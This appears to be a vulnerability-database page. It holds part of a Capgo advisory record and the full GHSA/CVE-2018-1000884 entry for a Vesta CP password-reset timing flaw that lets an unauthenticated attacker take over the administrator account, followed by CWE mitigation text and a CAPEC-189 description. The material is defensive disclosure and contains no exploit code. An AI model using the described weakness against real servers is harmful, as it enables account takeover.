      "url": "https://github.com/Cap-go/capgo/security/advisories/GHSA-35q8-ghfg-vp6m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56327"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/capgo-unauthenticated-organization-existence-oracle-via-public-invite-user-to-org-rpc"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-4544-6QCJ-9222

Vulnerability from github – Published: 2022-05-13 01:18 – Updated: 2022-05-13 01:18
VLAI
Details

Vesta CP version Prior to commit f6f6f9cfbbf2979e301956d1c6ab5c44386822c0 -- any release prior to 0.9.8-18 contains a CWE-208 / Information Exposure Through Timing Discrepancy vulnerability in Password reset code -- web/reset/index.php, line 51 that can result in Possible to determine password reset codes, attacker is able to change administrator password. This attack appear to be exploitable via Unauthenticated network connectivity. This vulnerability appears to have been fixed in After commit f6f6f9cfbbf2979e301956d1c6ab5c44386822c0 -- release version 0.9.8-19.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-1000884"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-12-20T21:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "Vesta CP version Prior to commit f6f6f9cfbbf2979e301956d1c6ab5c44386822c0 -- any release prior to 0.9.8-18 contains a CWE-208 / Information Exposure Through Timing Discrepancy vulnerability in Password reset code -- web/reset/index.php, line 51 that can result in Possible to determine password reset codes, attacker is able to change administrator password. This attack appear to be exploitable via Unauthenticated network connectivity. This vulnerability appears to have been fixed in After commit f6f6f9cfbbf2979e301956d1c6ab5c44386822c0 -- release version 0.9.8-19.",
  "id": "GHSA-4544-6qcj-9222",
  "modified": "2022-05-13T01:18:47Z",
  "published": "2022-05-13T01:18:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000884"
    },
    {
      "type": "WEB",
      "url": "https://github.com/serghey-rodin/vesta/commit/5f68c1b634abec2d5a4f83156bfd223d3a792f77#diff-4d7863e8c24a5e6102073acc2fb0f227"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation MIT-46
Architecture and Design

Strategy: Separation of Privilege

  • Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.
  • Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.
Mitigation MIT-39
Implementation
  • Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.
  • If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.
  • Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.
CAPEC-189: Black Box Reverse Engineering

An adversary discovers the structure, function, and composition of a type of computer software through black box analysis techniques. 'Black Box' methods involve interacting with the software indirectly, in the absence of direct access to the executable object. Such analysis typically involves interacting with the software at the boundaries of where the software interfaces with a larger execution environment, such as input-output vectors, libraries, or APIs. Black Box Reverse Engineering also refers to gathering physical side effects of a hardware device, such as electromagnetic radiation or sounds.